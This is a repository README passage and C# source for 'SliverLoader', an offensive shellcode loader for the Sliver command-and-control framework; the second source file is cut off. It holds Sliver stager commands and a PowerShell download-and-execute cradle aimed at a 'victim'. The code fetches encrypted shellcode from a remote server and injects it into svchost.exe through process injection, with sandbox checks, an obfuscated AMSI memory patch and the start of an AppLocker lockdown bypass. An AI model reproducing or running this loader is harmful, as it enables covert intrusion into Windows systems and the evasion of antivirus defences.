 34 | sliver > stage-listener --url https://192.168.8.205:8443 --profile monkeybox -c ~/Code/certs/crt.crt -k ~/Code/certs/key.key -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
 35 | ```
 36 | 4. To confirm that our listeners are running , run the jobs command
 37 | ```text
 38 | sliver > jobs
 39 | ```
 40 | 
 41 | ![Setup Sliver lister and stager](./doc/img/sliver001.png)
 42 | 
 43 | ## Shellcode Runner
 44 | 
 45 | The features intended for inclusion in this shellcode runner are support for various staging scenarios offered by the Sliver C2 (such as raw shellcode, compression, AES encryption, and combinations thereof), process hollowing, AMSI bypass, in-memory execution to avoid touching the disk whenever possible, and flexibility in passing arguments without hard-coded parameters, allowing arguments to be passed on the fly. Different approaches could be taken to achieve these goals. The chosen approach involves writing a C# DLL assembly containing all the necessary methods, embedding it in the PowerShell script as a base64 string, decoding the assembly and loading it into the process using reflection, and then specifying the arguments and executing the methods.
 46 | 
 47 | ### Download the Shellcode
 48 | 
 49 | One of the main problems encountered early on was that the default .NET WebClient object times out the connection after 60 seconds, and this attribute cannot be easily changed. The solution is to implement a slightly modified version of the WebClient object, allowing the default timeout to be overridden with a custom value. The implementation of this in C# is as follows:
 50 | 
 51 | ```csharp
 52 |  public class WebClientWithTimeout : WebClient
 53 | {
 54 |     protected override WebRequest GetWebRequest(Uri address)
 55 |     {
 56 |         WebRequest wr = base.GetWebRequest(address);
 57 |         wr.Timeout = 50000000; // timeout in milliseconds (ms)
 58 |         return wr;
 59 |     }
 60 | }
 61 | ```
 62 | 
 63 | Since a custom SSL certificate is being used, it is necessary to instruct the WebClient to ignore SSL certificate validation. This can be achieved by using a certificate validation handler that always returns true, as shown below:
 64 | 
 65 | ```csharp
 66 | ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };
 67 | ```
 68 | 
 69 | ### Shellcode decryption
 70 | 
 71 | On the Stagers wiki page, the Sliver C2 team provides a template for a C# shellcode runner that includes an implementation of AES decryption. The decryption method they provide can be used as follows:
 72 | ```csharp
 73 | public static byte[] Decrypt(byte[] ciphertext, string AESKey, string AESIV)
 74 | {
 75 |     byte[] key = Encoding.UTF8.GetBytes(AESKey);
 76 |     byte[] IV = Encoding.UTF8.GetBytes(AESIV);
 77 | 
 78 |     using (Aes aesAlg = Aes.Create())
 79 |     {
 80 |         aesAlg.Key = key;
 81 |         aesAlg.IV = IV;
 82 |         aesAlg.Padding = PaddingMode.None;
 83 | 
 84 |         ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
 85 | 
 86 |         using (MemoryStream memoryStream = new MemoryStream(ciphertext))
 87 |         {
 88 |             using (CryptoStream cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Write))
 89 |             {
 90 |                 cryptoStream.Write(ciphertext, 0, ciphertext.Length);
 91 |                 return memoryStream.ToArray();
 92 |             }
 93 |         }
 94 |     }
 95 | }
 96 | ```
 97 | ### Shellcode decompression
 98 | 
 99 | Sliver C2 supports Gzip, Deflate, and Zlib compression algorithms. Zlib was not implemented because it is only supported on .NET Framework version 7.0 and above, which does not fit our use case. Therefore, the decompression algorithm parameter will be set to Gzip or Deflate. Any other value will be treated as "no decompression needed":
100 | 
101 | ```csharp
102 | public static byte[] Decompress(byte[] data, string CompressionAlgorithm)
103 | {
104 |     byte[] decompressedArray = null;
105 |     if (CompressionAlgorithm == "deflate9")
106 |     {
107 |         using (MemoryStream decompressedStream = new MemoryStream())
108 |         {
109 |             using (MemoryStream compressStream = new MemoryStream(data))
110 |             {
111 |                 using (DeflateStream deflateStream = new DeflateStream(compressStream, CompressionMode.Decompress))
112 |                 {
113 |                     deflateStream.CopyTo(decompressedStream);
114 |                 }
115 |             }
116 |             decompressedArray = decompressedStream.ToArray();
117 |         }
118 |         return decompressedArray;
119 |     }
120 |     else if (CompressionAlgorithm == "gzip")
121 |     {
122 |         using (MemoryStream decompressedStream = new MemoryStream())
123 |         {
124 |             using (MemoryStream compressStream = new MemoryStream(data))
125 |             {
126 |                 using (GZipStream gzipStream = new GZipStream(compressStream, CompressionMode.Decompress))
127 |                 {
128 |                     gzipStream.CopyTo(decompressedStream);
129 |                 }
130 |             }
131 |             decompressedArray = decompressedStream.ToArray();
132 |         }
133 |         return decompressedArray;
134 |     }
135 |     else
136 |     {
137 |         return data;
138 |     }
139 | }
140 | ```
141 | 
142 | ### Process Hollowing
143 | 
144 | Process hollowing is accomplished by injecting shellcode into a process that ideally also generates network traffic to remain more covert. The implementation follows a basic pattern using Win32 APIs such as CreateProcessA, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to inject the code into processes like svchost.exe.
145 | 
146 | Conditional operations were added to separate different workflows and to allow passing parameters to various methods. The final source code is implemented in the file [Loader.cs](https://github.com/Cyb3rDudu/SliverLoader/blob/main/SliverLoader/Loader.cs).
147 | 
148 | ## Powershell Loader
149 | 
150 | The loader is a PowerShell script hosted on a web server, intended to be downloaded and executed once the attacker gains code execution. The script then loads the stager into memory via reflection and performs the download and execution of the agent from the staging server. 
151 | 
152 | To create the loader, the following steps are neccesarry:
153 | 
154 | First, the raw bytes of the assembly will need to be copied. For this, a PowerShell command will be used, which will copy the data to the clipboard.
155 | 
156 | ```powershell
157 | get-content -encoding byte -path .\sliverloader.dll | clip
158 | ```
159 | 
160 | Next use [CyberChef](https://cyberchef.io) to convert the data to base64. Convert "From Decimal" with delimiter Line feed "To Base64"
161 | 
162 | ![Convert assembly to base64](./doc/img/cyberchef001.png)
163 | 
164 | As powershell doesn't support **Raw Byte Encoding** which **Sliver C2** expects for **AES Encryption** and hardcoded keys in the assembly are not an option, they keys have to be converted with external tools like Cyberchef again.
165 | 
166 | ![Convert key to hex](./doc/img/cyberchef002.png)
167 | 
168 | Finally coppy the converted values to the script as in [loader.ps1](https://github.com/Cyb3rDudu/SliverLoader/blob/main/loader.ps1).
169 | 
170 | ```powershell
171 | $encodeStr = "TVqQAAMAAAAEAAAA..."
172 | 
173 | $decodeStr = [System.Convert]::FromBase64String($encodeStr)
174 | [System.Reflection.Assembly]::Load($decodeStr)
175 | $url = "https://192.168.X.X:8443/test.woff"
176 | $TargetBinary = "svchost.exe"
177 | [byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
178 | [byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
179 | 
180 | $CompressionAlgorithm = "deflate9"
181 | [Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)
182 | ```
183 | ## Deployment
184 | 
185 | The powershell loader is hosted on a webserver as `.txt` file e.g. `unsuspicious.txt`.
186 | On the victim, the following command executes the download and staging of the agent which will result in an incoming session in sliver.
187 | ```Powershell
188 | (New-Object System.Net.WebClient).DownloadString('https://some-server/unsuspicious.txt') | IEX)
189 | ```
190 | ![Catch the session with sliver](./doc/img/sliver002.png)
191 | 
192 | ## AV Evasion
193 | 
194 | The stager implements basic av evasion like process sleep, and check for api's that av engines usally don't implement.
195 | 
196 | ## AMSI Bypass
197 | 
198 | TODO: Find c# implementations for the assembly itsself instead of utilizing the droper
199 | 
200 | ## Applocker Bypass
201 | 


--------------------------------------------------------------------------------
/SliverLoader/Loader.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Collections.Generic;
  3 | using System.IO;
  4 | using System.Linq;
  5 | using System.Net;
  6 | using System.Runtime.InteropServices;
  7 | using System.Security.Cryptography;
  8 | using System.Text;
  9 | using System.IO.Compression;
 10 | using System.Diagnostics;
 11 | 
 12 | namespace SliverLoader
 13 | {
 14 |     public class Loader
 15 |     {
 16 |         [StructLayout(LayoutKind.Sequential)]
 17 |         public class SecurityAttributes
 18 |         {
 19 |             public Int32 Length = 0;
 20 |             public IntPtr lpSecurityDescriptor = IntPtr.Zero;
 21 |             public bool bInheritHandle = false;
 22 | 
 23 |             public SecurityAttributes()
 24 |             {
 25 |                 this.Length = Marshal.SizeOf(this);
 26 |             }
 27 |         }
 28 |         [StructLayout(LayoutKind.Sequential)]
 29 |         public struct ProcessInformation
 30 |         {
 31 |             public IntPtr hProcess;
 32 |             public IntPtr hThread;
 33 |             public Int32 dwProcessId;
 34 |             public Int32 dwThreadId;
 35 |         }
 36 |         [Flags]
 37 |         public enum CreateProcessFlags : uint
 38 |         {
 39 |             DEBUG_PROCESS = 0x00000001,
 40 |             DEBUG_ONLY_THIS_PROCESS = 0x00000002,
 41 |             CREATE_SUSPENDED = 0x00000004,
 42 |             DETACHED_PROCESS = 0x00000008,
 43 |             CREATE_NEW_CONSOLE = 0x00000010,
 44 |             NORMAL_PRIORITY_CLASS = 0x00000020,
 45 |             IDLE_PRIORITY_CLASS = 0x00000040,
 46 |             HIGH_PRIORITY_CLASS = 0x00000080,
 47 |             REALTIME_PRIORITY_CLASS = 0x00000100,
 48 |             CREATE_NEW_PROCESS_GROUP = 0x00000200,
 49 |             CREATE_UNICODE_ENVIRONMENT = 0x00000400,
 50 |             CREATE_SEPARATE_WOW_VDM = 0x00000800,
 51 |             CREATE_SHARED_WOW_VDM = 0x00001000,
 52 |             CREATE_FORCEDOS = 0x00002000,
 53 |             BELOW_NORMAL_PRIORITY_CLASS = 0x00004000,
 54 |             ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000,
 55 |             INHERIT_PARENT_AFFINITY = 0x00010000,
 56 |             INHERIT_CALLER_PRIORITY = 0x00020000,
 57 |             CREATE_PROTECTED_PROCESS = 0x00040000,
 58 |             EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
 59 |             PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000,
 60 |             PROCESS_MODE_BACKGROUND_END = 0x00200000,
 61 |             CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
 62 |             CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
 63 |             CREATE_DEFAULT_ERROR_MODE = 0x04000000,
 64 |             CREATE_NO_WINDOW = 0x08000000,
 65 |             PROFILE_USER = 0x10000000,
 66 |             PROFILE_KERNEL = 0x20000000,
 67 |             PROFILE_SERVER = 0x40000000,
 68 |             CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000,
 69 |         }
 70 | 
 71 | 
 72 |         [StructLayout(LayoutKind.Sequential)]
 73 |         public class StartupInfo
 74 |         {
 75 |             public Int32 cb = 0;
 76 |             public IntPtr lpReserved = IntPtr.Zero;
 77 |             public IntPtr lpDesktop = IntPtr.Zero;
 78 |             public IntPtr lpTitle = IntPtr.Zero;
 79 |             public Int32 dwX = 0;
 80 |             public Int32 dwY = 0;
 81 |             public Int32 dwXSize = 0;
 82 |             public Int32 dwYSize = 0;
 83 |             public Int32 dwXCountChars = 0;
 84 |             public Int32 dwYCountChars = 0;
 85 |             public Int32 dwFillAttribute = 0;
 86 |             public Int32 dwFlags = 0;
 87 |             public Int16 wShowWindow = 0;
 88 |             public Int16 cbReserved2 = 0;
 89 |             public IntPtr lpReserved2 = IntPtr.Zero;
 90 |             public IntPtr hStdInput = IntPtr.Zero;
 91 |             public IntPtr hStdOutput = IntPtr.Zero;
 92 |             public IntPtr hStdError = IntPtr.Zero;
 93 |             public StartupInfo()
 94 |             {
 95 |                 this.cb = Marshal.SizeOf(this);
 96 |             }
 97 |         }
 98 |         [DllImport("kernel32.dll")]
 99 |         public static extern IntPtr CreateProcessA(String lpApplicationName, String lpCommandLine, SecurityAttributes lpProcessAttributes, SecurityAttributes lpThreadAttributes, Boolean bInheritHandles, CreateProcessFlags dwCreationFlags,
100 |                 IntPtr lpEnvironment,
101 |                 String lpCurrentDirectory,
102 |                 [In] StartupInfo lpStartupInfo,
103 |                 out ProcessInformation lpProcessInformation
104 | 
105 |             );
106 | 
107 |         [DllImport("kernel32.dll")]
108 |         public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
109 | 
110 |         [DllImport("kernel32.dll")]
111 |         public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] buffer, IntPtr dwSize, int lpNumberOfBytesWritten);
112 | 
113 |         [DllImport("kernel32.dll", SetLastError = true)]
114 |         public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten);
115 | 
116 |         [DllImport("kernel32.dll")]
117 |         static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
118 | 
119 |         [DllImport("kernel32.dll")]
120 |         static extern void Sleep(uint dwMilliseconds);
121 | 
122 |         [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
123 |         static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
124 | 
125 |         [DllImport("kernel32.dll")]
126 |         static extern IntPtr GetCurrentProcess();
127 | 
128 |         [DllImport("kernel32.dll")]
129 |         static extern UInt32 FlsAlloc(IntPtr lpCallback);
130 | 
131 |         [DllImport("kernel32")]
132 |         public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
133 | 
134 |         [DllImport("kernel32")]
135 |         public static extern IntPtr LoadLibrary(string name);
136 | 
137 |         [DllImport("kernel32")]
138 |         public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
139 | 
140 |         [DllImport("kernel32.dll")]
141 |         public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
142 | 
143 |         [DllImport("kernel32.dll")]
144 |         public static extern bool CloseHandle(IntPtr hObject);
145 | 
146 |         private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
147 |         private static UInt32 MEM_COMMIT = 0x1000;
148 | 
149 |         private static int PROCESS_VM_OPERATION = 0x0008;
150 |         private static int PROCESS_VM_READ = 0x0010;
151 |         private static int PROCESS_VM_WRITE = 0x0020;
152 | 
153 |         public static void DownloadAndExecute(string url, string TargetBinary, string CompressionAlgorithm, byte[] AESKey, byte[] AESIV)
154 |         {
155 |             DateTime t1 = DateTime.Now;
156 |             Sleep(2000);
157 |             double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
158 |             if (t2 < 1.5)
159 |             {
160 |                 return;
161 |             }
162 | 
163 |             IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
164 |             if (mem == null)
165 |             {
166 |                 return;
167 |             }
168 | 
169 |             UInt32 result = FlsAlloc(IntPtr.Zero);
170 |             if (result != 0xFFFFFFFF)
171 |             {
172 |                 return;
173 |             }
174 | 
175 |             Bypass();
176 | 
177 |             ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;
178 |             System.Net.WebClient client = new WebClientWithTimeout();
179 | 
180 |             byte[] encrypted = client.DownloadData(url);
181 |             List<byte> l = new List<byte> { };
182 |             byte[] actual;
183 |             byte[] compressed;
184 |             if (AESKey != null && AESIV != null)
185 |             {
186 | 
187 | 
188 |                 for (int i = 16; i <= encrypted.Length - 1; i++)
189 |                 {
190 |                     l.Add(encrypted[i]);
191 | 
192 |                 }
193 |                 actual = l.ToArray();
194 |                 compressed = Decrypt(actual, AESKey, AESIV);
195 |             }
196 |             else
197 |             {
198 |                 compressed = encrypted;
199 | 
200 |             }
201 | 
202 |             byte[] sc = Decompress(compressed, CompressionAlgorithm);
203 |             string binary = TargetBinary;
204 | 
205 |             Int32 size = sc.Length;
206 |             StartupInfo sInfo = new StartupInfo();
207 |             sInfo.dwFlags = 0;
208 |             ProcessInformation pInfo;
209 |             string binaryPath = "C:\\Windows\\System32\\" + binary;
210 |             IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
211 |             IntPtr hProcess = pInfo.hProcess;
212 |             IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
213 | 
214 |             int test = 0;
215 |             IntPtr size2 = new IntPtr(sc.Length);
216 |             bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test);
217 |             CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
218 |             return;
219 |         }
220 |         public static byte[] Decompress(byte[] data, string CompressionAlgorithm)
221 |         {
222 |             byte[] decompressedArray = null;
223 |             if (CompressionAlgorithm == "deflate9")
224 |             {
225 |                 using (MemoryStream decompressedStream = new MemoryStream())
226 |                 {
227 |                     using (MemoryStream compressStream = new MemoryStream(data))
228 |                     {
229 |                         using (DeflateStream deflateStream = new DeflateStream(compressStream, CompressionMode.Decompress))
230 |                         {
231 |                             deflateStream.CopyTo(decompressedStream);
232 |                         }
233 |                     }
234 |                     decompressedArray = decompressedStream.ToArray();
235 |                 }
236 |                 return decompressedArray;
237 |             }
238 |             else if (CompressionAlgorithm == "gzip")
239 |             {
240 |                 using (MemoryStream decompressedStream = new MemoryStream())
241 |                 {
242 |                     using (MemoryStream compressStream = new MemoryStream(data))
243 |                     {
244 |                         using (GZipStream gzipStream = new GZipStream(compressStream, CompressionMode.Decompress))
245 |                         {
246 |                             gzipStream.CopyTo(decompressedStream);
247 |                         }
248 |                     }
249 |                     decompressedArray = decompressedStream.ToArray();
250 |                 }
251 |                 return decompressedArray;
252 |             }
253 |             else
254 |             {
255 | 
256 |                 return data;
257 |             }
258 | 
259 | 
260 |         }
261 |         public static byte[] Decrypt(byte[] ciphertext, byte[] AESKey, byte[] AESIV)
262 |         {
263 |             byte[] key = AESKey;
264 |             byte[] IV = AESIV;
265 | 
266 |             using (Aes aesAlg = Aes.Create())
267 |             {
268 |                 aesAlg.Key = key;
269 |                 aesAlg.IV = IV;
270 |                 aesAlg.Padding = PaddingMode.None;
271 | 
272 |                 ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
273 | 
274 |                 using (MemoryStream memoryStream = new MemoryStream(ciphertext))
275 |                 {
276 |                     using (CryptoStream cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Write))
277 |                     {
278 |                         cryptoStream.Write(ciphertext, 0, ciphertext.Length);
279 |                         return memoryStream.ToArray();
280 |                     }
281 |                 }
282 |             }
283 |         }
284 |         public class WebClientWithTimeout : WebClient
285 |         {
286 |             protected override WebRequest GetWebRequest(Uri address)
287 |             {
288 |                 WebRequest wr = base.GetWebRequest(address);
289 |                 wr.Timeout = 50000000; // timeout in milliseconds (ms)
290 |                 return wr;
291 |             }
292 |         }
293 |         static int Bypass()
294 |         {
295 |             Char c1, c2, c3, c4, c5, c6, c7, c8, c9, c10;
296 |             c1 = 'A';
297 |             c2 = 's';
298 |             c3 = 'c';
299 |             c4 = 'n';
300 |             c5 = 'l';
301 |             c6 = 't';
302 |             c7 = 'z';
303 |             c8 = 'U';
304 |             c9 = 'y';
305 |             c10 = 'o';
306 |             string[] filePaths = Directory.GetFiles(@"c:\wind" + c10 + "ws\\s" + c9 + "stem32", "a?s?.d*");
307 |             string libname = (filePaths[0].Substring(filePaths[0].Length - 8));
308 | 
309 |             byte patch = 0xEB;
310 | 
311 |             IntPtr hHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, false, Process.GetCurrentProcess().Id);
312 |             if (hHandle != IntPtr.Zero)
313 |             {
314 |                 Console.WriteLine("[+] Process opened with Handle ~> " + hHandle);
315 |             }
316 | 
317 |             IntPtr amsiDLL = LoadLibrary(libname);
318 |             if (amsiDLL != IntPtr.Zero)
319 |             {
320 |                 Console.WriteLine("[+] amsi.dll located at ~> " + amsiDLL);
321 |             }
322 | 
323 |             IntPtr amsiOpenSession = GetProcAddress(amsiDLL, c1 + "m" + c2 + "iOpenSe" + c2 + c2 + "io" + c4);
324 |             if (amsiOpenSession != IntPtr.Zero)
325 |             {
326 |                 Console.WriteLine("[+] AmsiOpenSession located at ~> " + amsiOpenSession);
327 |             }
328 | 
329 |             IntPtr patchAddr = (IntPtr)(amsiOpenSession.ToInt64() + 3);
330 |             Console.WriteLine("[+] Trying to Inject ~> " + patchAddr);
331 | 
332 |             int bytesWritten = 0;
333 |             bool result = WriteProcessMemory(hHandle, patchAddr, new byte[] { patch }, 1, out bytesWritten);
334 |             if (result)
335 |             {
336 |                 Console.WriteLine("[!] Process Memory Injected!");
337 |             }
338 | 
339 |             CloseHandle(hHandle);
340 |             return 0;
341 |         }
342 |     }
343 | }
344 | 


--------------------------------------------------------------------------------
/SliverBypassLoader/Program.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.IO;
  3 | using System.Text;
  4 | using System.Management.Automation;
  5 | using System.Management.Automation.Runspaces;
  6 | using System.Collections.ObjectModel;
  7 | using System.Runtime.InteropServices;
  8 | using System.Runtime.CompilerServices;
  9 | using System.Linq;
 10 | using System.Collections.Generic;
 11 | using System.Configuration.Install;
 12 | using System.Management.Automation.Host;
 13 | using System.Runtime.Remoting.Contexts;
 14 | using System.IO.Compression;
 15 | using System.Net;
 16 | using System.Security.Cryptography;
 17 | using System.Diagnostics;
 18 | 
 19 | namespace SliverBypassLoader
 20 | {
 21 |     class altbypass
 22 |     {
 23 |         [StructLayout(LayoutKind.Sequential)]
 24 |         public class SecurityAttributes
 25 |         {
 26 |             public Int32 Length = 0;
 27 |             public IntPtr lpSecurityDescriptor = IntPtr.Zero;
 28 |             public bool bInheritHandle = false;
 29 | 
 30 |             public SecurityAttributes()
 31 |             {
 32 |                 this.Length = Marshal.SizeOf(this);
 33 |             }
 34 |         }
 35 |         [StructLayout(LayoutKind.Sequential)]
 36 |         public struct ProcessInformation
 37 |         {
 38 |             public IntPtr hProcess;
 39 |             public IntPtr hThread;
 40 |             public Int32 dwProcessId;
 41 |             public Int32 dwThreadId;
 42 |         }
 43 |         [Flags]
 44 |         public enum CreateProcessFlags : uint
 45 |         {
 46 |             DEBUG_PROCESS = 0x00000001,
 47 |             DEBUG_ONLY_THIS_PROCESS = 0x00000002,
 48 |             CREATE_SUSPENDED = 0x00000004,
 49 |             DETACHED_PROCESS = 0x00000008,
 50 |             CREATE_NEW_CONSOLE = 0x00000010,
 51 |             NORMAL_PRIORITY_CLASS = 0x00000020,
 52 |             IDLE_PRIORITY_CLASS = 0x00000040,
 53 |             HIGH_PRIORITY_CLASS = 0x00000080,
 54 |             REALTIME_PRIORITY_CLASS = 0x00000100,
 55 |             CREATE_NEW_PROCESS_GROUP = 0x00000200,
 56 |             CREATE_UNICODE_ENVIRONMENT = 0x00000400,
 57 |             CREATE_SEPARATE_WOW_VDM = 0x00000800,
 58 |             CREATE_SHARED_WOW_VDM = 0x00001000,
 59 |             CREATE_FORCEDOS = 0x00002000,
 60 |             BELOW_NORMAL_PRIORITY_CLASS = 0x00004000,
 61 |             ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000,
 62 |             INHERIT_PARENT_AFFINITY = 0x00010000,
 63 |             INHERIT_CALLER_PRIORITY = 0x00020000,
 64 |             CREATE_PROTECTED_PROCESS = 0x00040000,
 65 |             EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
 66 |             PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000,
 67 |             PROCESS_MODE_BACKGROUND_END = 0x00200000,
 68 |             CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
 69 |             CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
 70 |             CREATE_DEFAULT_ERROR_MODE = 0x04000000,
 71 |             CREATE_NO_WINDOW = 0x08000000,
 72 |             PROFILE_USER = 0x10000000,
 73 |             PROFILE_KERNEL = 0x20000000,
 74 |             PROFILE_SERVER = 0x40000000,
 75 |             CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000,
 76 |         }
 77 | 
 78 | 
 79 |         [StructLayout(LayoutKind.Sequential)]
 80 |         public class StartupInfo
 81 |         {
 82 |             public Int32 cb = 0;
 83 |             public IntPtr lpReserved = IntPtr.Zero;
 84 |             public IntPtr lpDesktop = IntPtr.Zero;
 85 |             public IntPtr lpTitle = IntPtr.Zero;
 86 |             public Int32 dwX = 0;
 87 |             public Int32 dwY = 0;
 88 |             public Int32 dwXSize = 0;
 89 |             public Int32 dwYSize = 0;
 90 |             public Int32 dwXCountChars = 0;
 91 |             public Int32 dwYCountChars = 0;
 92 |             public Int32 dwFillAttribute = 0;
 93 |             public Int32 dwFlags = 0;
 94 |             public Int16 wShowWindow = 0;
 95 |             public Int16 cbReserved2 = 0;
 96 |             public IntPtr lpReserved2 = IntPtr.Zero;
 97 |             public IntPtr hStdInput = IntPtr.Zero;
 98 |             public IntPtr hStdOutput = IntPtr.Zero;
 99 |             public IntPtr hStdError = IntPtr.Zero;
100 |             public StartupInfo()
101 |             {
102 |                 this.cb = Marshal.SizeOf(this);
103 |             }
104 |         }
105 |         [DllImport("kernel32.dll")]
106 |         public static extern IntPtr CreateProcessA(String lpApplicationName, String lpCommandLine, SecurityAttributes lpProcessAttributes, SecurityAttributes lpThreadAttributes, Boolean bInheritHandles, CreateProcessFlags dwCreationFlags,
107 |                 IntPtr lpEnvironment,
108 |                 String lpCurrentDirectory,
109 |                 [In] StartupInfo lpStartupInfo,
110 |                 out ProcessInformation lpProcessInformation
111 | 
112 |             );
113 | 
114 |         [DllImport("kernel32.dll")]
115 |         public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
116 | 
117 |         [DllImport("kernel32.dll")]
118 |         public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] buffer, IntPtr dwSize, int lpNumberOfBytesWritten);
119 | 
120 |         [DllImport("kernel32.dll")]
121 |         static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
122 | 
123 |         [DllImport("kernel32.dll", SetLastError = true)] 
124 |         static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);
125 | 
126 |         [DllImport("kernel32.dll", SetLastError = true)] 
127 |         public static extern IntPtr GetCurrentProcess();
128 | 
129 |         [DllImport("kernel32")]
130 |         public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
131 | 
132 |         [DllImport("kernel32")] 
133 |         public static extern IntPtr LoadLibrary(string name);
134 | 
135 |         [DllImport("kernel32")] 
136 |         public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
137 | 
138 |         [DllImport("kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
139 |         static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
140 | 
141 |         [DllImport("kernel32.dll")]
142 |         public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
143 | 
144 |         [DllImport("kernel32.dll", SetLastError = true)]
145 |         public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten);
146 | 
147 |         [DllImport("kernel32.dll")]
148 |         public static extern bool CloseHandle(IntPtr hObject);
149 | 
150 |         private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
151 |         private static UInt32 MEM_COMMIT = 0x1000;
152 |         private static int PROCESS_VM_OPERATION = 0x0008;
153 |         private static int PROCESS_VM_READ = 0x0010;
154 |         private static int PROCESS_VM_WRITE = 0x0020;
155 | 
156 |         public static void Main(string[] args)
157 |         {
158 |             // Parse args
159 |             string listenerUrl = "", compressAlgorithm = "", targetBinary = "", aesKey = "", aesIv = "";
160 |             if (args != null && 
161 |                 args.Length > 0 && 
162 |                 !string.IsNullOrEmpty(args[0]) && 
163 |                 !string.IsNullOrEmpty(args[1]) && 
164 |                 !string.IsNullOrEmpty(args[2]) && 
165 |                 !string.IsNullOrEmpty(args[3]) && 
166 |                 !string.IsNullOrEmpty(args[4]))
167 |             {
168 |                 listenerUrl = args[0];
169 |                 targetBinary = args[1];
170 |                 compressAlgorithm = args[2];
171 |                 aesKey = args[3];
172 |                 aesIv = args[4];
173 |             }
174 | 
175 |             Bypass();
176 | 
177 |             Char a1, a2, a3, a4, a5;
178 |             a1 = 'y';
179 |             a2 = 'g';
180 |             a3 = 'u';
181 |             a4 = 'o';
182 |             a5 = 't';
183 |             var Automation = typeof(System.Management.Automation.Alignment).Assembly;
184 |             // Get ptr to System.Management.AutomationSecurity.SystemPolicy.GetSystemLockdownPolicy
185 |             var get_l_info = Automation.GetType("S" + a1 + "stem.Mana" + a2 + "ement.Au" + a5 + "oma" + a5 + "ion.Sec" + a3 + "rity.S" + a1 + "stemP" + a4 + "licy").GetMethod("GetS" + a1 + "stemL" + a4 + "ckdownP" + a4 + "licy", System.Reflection.BindingFlags.Public | System.Reflection.BindingFlags.Static);
186 |             var get_l_handle = get_l_info.MethodHandle;
187 |             uint lpflOldProtect;
